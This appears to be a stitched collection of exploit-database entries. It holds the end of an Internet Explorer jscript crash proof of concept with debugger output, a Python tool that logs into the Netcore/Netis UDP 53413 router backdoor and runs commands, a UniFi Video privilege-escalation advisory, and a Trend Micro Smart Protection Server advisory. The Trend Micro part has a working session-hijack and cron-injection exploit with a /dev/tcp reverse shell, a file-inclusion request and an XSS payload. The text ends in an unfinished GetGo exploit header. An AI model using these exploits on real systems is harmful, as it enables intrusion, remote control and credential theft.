var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>
<!--
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
VAR object;
VAR length;
NameTbl *nametable;
if(!ConvertToObject(session, this, &object, 0)) {
//set error and return
}
if(!IsJSObject(&object, &nametable)) {
//set error and return
}
if(nametable->GetVal(&g_sym_length, &length) < 0) {
//set error and return
}
if(length->type != TYPE_INT) {
ConvertToScalar(session, &length, &length, 3, 1);
}
...
}
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080
r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
r14=000002a7533c5a70 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,r14
============================================
-->
#!/usr/bin/python
# -*- coding: utf8 -*-
# NETCORE / NETDIS UDP 53413 BACKDOOR
# https://netisscan.shadowserver.org/
# http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
# https://www.seebug.org/vuldb/ssvid-90227
import socket
import struct
import logging
logging.basicConfig(level=logging.INFO, format="%(message)16s")
def create_udp_socket(timeout=10):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(timeout)
return sock
def send_netcore_request(sock, host, port, data):
HEAD = "\x00" * 8
data = HEAD + data
sock.sendto(data, (host, port))
def recv_netcore_response(sock, buffsize=512):
try:
resp = None
addr = None
resp, addr = sock.recvfrom(buffsize)
except Exception as err:
logging.debug('[-] %s' % err)
finally:
return resp, addr
def do_mptlogin(sock, host, port):
"""
login netcore backdoor
"""
netcore_response = []
netcore_commands = ['netcore', '?']
for command in netcore_commands:
send_netcore_request(sock, host, port, command)
resp, addr = recv_netcore_response(sock)
if resp and resp not in netcore_response:
netcore_response.append(resp)
response_string = ",".join(netcore_response)
if len(netcore_response) >= 1 and ('\x00\x00\x00\x05' in response_string):
return (True, netcore_response)
return (False, netcore_response)
# ['\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00Login successed!\r\n',
# '\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x7f']
# ['\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x7f',
# '\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00'
# 'IGD MPT Interface daemon 1.0\x00']
# ['\x00\x00\x00\x06\x00\x01\x00\x00\xff\xff\xff\xffapmib_init fail!\r\n']
# ['\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00']
# sh: netcore: not found
# sh: /etc/services: Permission denied
# ['\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00']
# First Login : 'AA\x00\x05ABAA\x00\x00\x00\x00Login successed!\r\n'
# Second Login : IGD MPT Interface daemon 1.0
def do_mptfun(sock, host, port, cmdstring):
"""
Usage: $Help
Usage: $WriteMac <macaddr> <lan|wan|wlan1|wlan2|wlan3|wlan4>
Usage: $ReadMac <lan|wan|wlan1|wlan2|wlan3|wlan4>[<str|STR>[separator]|bin]
Usage: $WriteRegion <region> <wlan1|wlan3>
Usage: $ReadRegion <wlan1|wlan3>
Usage: $WriteSSID <SSID> <wlan1|wlan2|wlan3|wlan4>
Usage: $ReadSSID <wlan1|wlan2|wlan3|wlan4>
DESCRIPTION:
wlan1:2.4G main AP
wlan2:2.4G Multiple AP
wlan3:5G Main AP
wlan4:5G Multiple AP
region:the abbreviation of the country,Must be capitalized.Like US,HK,JP
"""
send_netcore_request(sock, host, port, cmdstring)
resp, addr = recv_netcore_response(sock)
if resp:
return (True, resp)
return (False, resp)
do_syscmd = do_mptfun
def do_getfile(sock, host, port, filename):
buffsize = 0x408 # buff size to read
datasize = 0x408 # data size from socket
contents = []
u1, u2, u3, u4 = 0, 1, 0, 0
HEAD = struct.pack('>H', u1)
HEAD += struct.pack('>H', u2)
HEAD += struct.pack('>H', u3)
HEAD += struct.pack('>H', u4)
data = HEAD + filename
sock.sendto(data, (host, port))
while buffsize == datasize:
data, addr = recv_netcore_response(sock, buffsize=buffsize)
if not data:
break
datasize = len(data)
u1, u2, u3, u4 = struct.unpack('>HHHH', data[:8])
contents.append(data[8:])
u2 = 5
HEAD = struct.pack('>H', u1)
HEAD += struct.pack('>H', u2)
HEAD += struct.pack('>H', u3)
HEAD += struct.pack('>H', u4)
sock.sendto(HEAD, (host, port))
data = "".join(contents)
if contents:
return True, data
return False, data
def do_putfile():
pass
def check(host, port=53413):
sock = create_udp_socket(timeout=8)
is_login, resp = do_mptlogin(sock, host, port)
print(is_login, resp)
if is_login:
print("[+] %s:%s - \033[32mvulnerable\033[m" % (host, port))
# bool_ret, resp = do_mptfun(sock, host, port, '$help')
# print(resp)
# bool_ret, resp = do_getfile(sock, host, port, '/cfg/dhcpd.conf')
# print(resp)
bool_ret, resp = do_syscmd(sock, host, port, 'ls -al /tmp')
sock.close()
if __name__ == "__main__":
import sys
if len(sys.argv) != 2:
print("[*] Usage: {} <target-netdis-ip>".format(sys.argv[0]))
else:
check(sys.argv[1])
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Ubiquiti UniFi Video (Windows)
Vendor URL: https://www.ubnt.com
Type: Improper Handling of Insufficient Permissions or Privileges
[CWE-280]
Date found: 2016-05-24
Date published: 2017-12-20
CVSSv3 Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2016-6914
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
UniFi Video 3.7.3 (Windows),
UniFi Video 3.7.0 (Windows),
UniFi Video 3.2.2 (Windows),
older versions may be affected too.
4. INTRODUCTION
===============
UniFi Video is a powerful and flexible, integrated IP video management
surveillance system designed to work with Ubiquiti’s UniFi Video Camera product
line. UniFi Video has an intuitive, configurable, and feature‑packed user
interface with advanced features such as motion detection, auto‑discovery,
user-level security, storage management, reporting, and mobile device support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.
However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.
By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.
6. RISK
=======
To successfully exploit this vulnerability, an attacker must already have access
to a system running a vulnerable installation of UniFi video using a
low-privileged user account (i.e. through a password compromise).
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM, which basically means a complete loss of
the system's confidentiality, integrity as well as availability.
7. SOLUTION
===========
Update to v3.8.0
8. REPORT TIMELINE
==================
2016-05-24: Discovery of the vulnerability
2016-05-24: Reported to vendor via HackerOne (#140793)
2016-05-24: Vendor acknowledges the vulnerability
2016-08-22: Request for status update
2016-08-22: Vendor states that there is no update so far
2016-08-23: MITRE assigns CVE-2016-6914
2016-11-08: Request for status update
2016-11-08: Vendor states that there is no update so far
2016-12-08: Request for status update
2016-12-08: Vendor states that project team is working on it
2017-02-23: Request for status update
2017-03-23: No response from vendor
2017-03-23: Request for status update
2017-03-23: Vendor states that fix is scheduled for v3.7.0
2017-05-23: v3.7.0 was released, but vulnerability is still exploitable,
vendor notified again
2017-06-07: Vendor states that fix is actually delayed
2017-08-26: Vendor provides beta versions of 3.7.3 and 3.8.0-beta3, which should
fix the issue
2017-08-31: While v3.7.3 is still vulnerable, the issue was fixed in 3.8.0-beta3
2017-09-18: v3.8.0 released publicly
2017-12-20: Public disclosure
9. REFERENCES
=============
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-6914
https://hackerone.com/reports/140793
# Trend Micro Smart Protection Server Multiple Vulnerabilities
## 1. Advisory Information
**Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities
**Advisory ID:** CORE-2017-0008
**Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities
**Date published:** 2017-12-19
**Date of last update:** 2017-12-11
**Vendors contacted:** Trend Micro
**Release mode:** Coordinated release
## 2. Vulnerability Information
**Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)]
**Impact:** Code execution
**Remotely Exploitable:** Yes
**Locally Exploitable:** Yes
**CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)
## 3. Vulnerability Description
Trend Micro's website states that:
Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server.
Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system.
## 4. Vulnerable Packages
* Trend Micro Smart Protection Server 3.2 (Build 1085)
Other products and versions might be affected, but they were not tested.
## 5. Vendor Information, Solutions and Workarounds
Trend Micro published the following patches:
* TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628))
* TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030))
## 6. Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
## 7. Technical Description / Proof of Concept Code
In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application.
Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application.
Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges.
Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console.
### 7.1 Session hijacking via log file disclosure
[[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format:
```
2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null,
Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218
```
Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests.
### 7.2 Remote command execution via cron job injection
[[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter.
File /var/www/AdminUI/php/admin_update_program.php:
```
if ($_SERVER['REQUEST_METHOD'] == 'POST'){
[...]
$arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0";
[...]
if ( $arr_au['Program']['UseAUSchedule'] == "1"){
if ( $arr_au['Program']['AUScheduleType'] == "0" ){
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*");
}else {
$crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']);
}
$crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1");
$crontab->saveCronFile();
}
if(! $crontab->addToCrontab()){
header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ;
exit;
}
```
File /var/www/AdminUI/php/inc/crontab.php:
```
function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){
if($min=="0")
$this->minute=0;
elseif($min)
$this->minute=$min;
else
$this->minute="*";
if($hour=="0")
$this->hour=0;
elseif($hour)
$this->hour=$hour;
else
$this->hour="*";
$this->month=($month) ? $month : "*";
$this->day=($day) ? $day : "*";
$this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*";
}
function saveCronFile(){
$command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n";
if(!fwrite($this->handle, $command))
return true;
else
return false;
}
function addToCrontab(){
if(!$this->filename)
exit('No name specified for cron file');
$data=array();
exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret);
if($ret==0)
return true;
else
return false;
}
```
The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication.
```
#!/usr/bin/env python
import requests
import sys
def exploit(host, port, command):
session_id = get_session_id(host, port)
print "[+] Obtained session id %s" % session_id
execute_command(session_id, host, port, command)
def get_session_id(host, port):
url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port)
r = requests.get(url, verify=False)
for line in r.text.split('n')[::-1]:
if "INFO" in line or "ERROR" in line:
return line.split(',')(http://cwe.mitre.org/data/definitions/98.html)
def execute_command(session_id, host, port, command):
print "[+] Executing command '%s' on %s:%d" % (command, host, port)
url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id)
multipart_data = {
"ComponentSchedule": "on",
"ComponentScheduleOS": "on",
"ComponentScheduleService": "on",
"ComponentScheduleWidget": "on",
"useAUSchedule": "on",
"auschedule_setting": "1",
"update_method": "1",
"update_method3": "on",
"userfile": "",
"sid": session_id,
"hidComponentScheduleOS": "1",
"hidComponentScheduleService": "1",
"hidComponentScheduleWidget": "1",
"hidUseAUSchedule": "1",
"hidScheduleType": "1",
"hidTimingDay": "2",
"hidTimingHour": "2",
"hidTimingMin": "* * * * * %s #" % command,
"hidUpdateOption": "1",
"hidUpdateNowFlag": ""
}
r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False)
if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text:
print "[+] Cron job added, enjoy!"
else:
print "[-] Session has probably timed out, try again later!"
if __name__ == "__main__":
exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html))
```
The following proof of concept opens a reverse shell to the attacker's machine.
```
$ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1'
[+] Obtained session id q514un6ru6stcpf3k0n4putbd3
[+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343
[+] Cron job added, enjoy!
$ nc -lvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508)
bash: no job control in this shell
[webserv@ localhost ~]$
```
### 7.3 Remote command execution via local file inclusion
[[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename.
File /var/www/AdminUI/widget/inc/widget_package_manager.php:
```
switch($widgetRequest['act']){
case "check":
try{
// $strUpdateType = widget, configure_widget_and_widget_component
$strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget';
$strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update';
$isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName();
[...]
```
File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php:
```
public function getWidgetPoolManager($strUpdateType = 'widget'){
if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){
$strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType);
require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php');
$strClassName = 'WF'.$strFileName.'PoolManager';
self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework);
}
return self::$instance[__FUNCTION__][$strUpdateType];
}
```
One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console.
Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive.
As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate:
```
; =======================================
; ActiveUpdate 1.2 US
;
; Filename: Server.ini
;
; New Format AU 1.8
;
; Last modified by AUJP1 10/14/2015
; =======================================
[Common]
Version=1.2
CertExpireDate=Jul 28 08:52:40 2019 GMT
[Server]
AvailableServer=1
Server.1=http://<serverIP>:1080/
AltServer=http://<serverIP>:1080/
Https=http://<serverIP>:1080/
[PATTERN]
P.48040039=pattern/bf1747402402.zip,1747402402,257
```
After triggering an update from the Web console, the PHP script is written to the expected location.
```
[root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php
-rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php
```
The final step is to include the script and execute our payload.
```
POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1
Host: 192.168.45.186:4343
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Request: JSON
X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7
Content-Type: application/json; charset=utf-8
Content-Length: 122
Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7
Connection: close
{"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"}
```
Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges.
### 7.4 Stored cross-site scripting
[[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs.
After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section.
The following proof of concept stores code to open an alert box.
```
https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn=
```
### 7.5 Improper access control
[[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL:
```
https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db
```
The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication.
```
https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key
```
This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless.
## 8 Report Timeline
* **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory.
* **2017-10-02: **Core Security asked for an update on the vulnerability reported.
* **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October)
* **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished.
* **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA.
* **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date.
* **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities.
* **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th.
* **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST.
* **2017-12-19: ** Advisory CORE-2017-0008 published.
## 9 References
http://cwe.mitre.org/data/definitions/532.html
## 10 About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: .
## 11 About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](mailto:info%40coresecurity.com)
## 12 Disclaimer
The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
1. Description
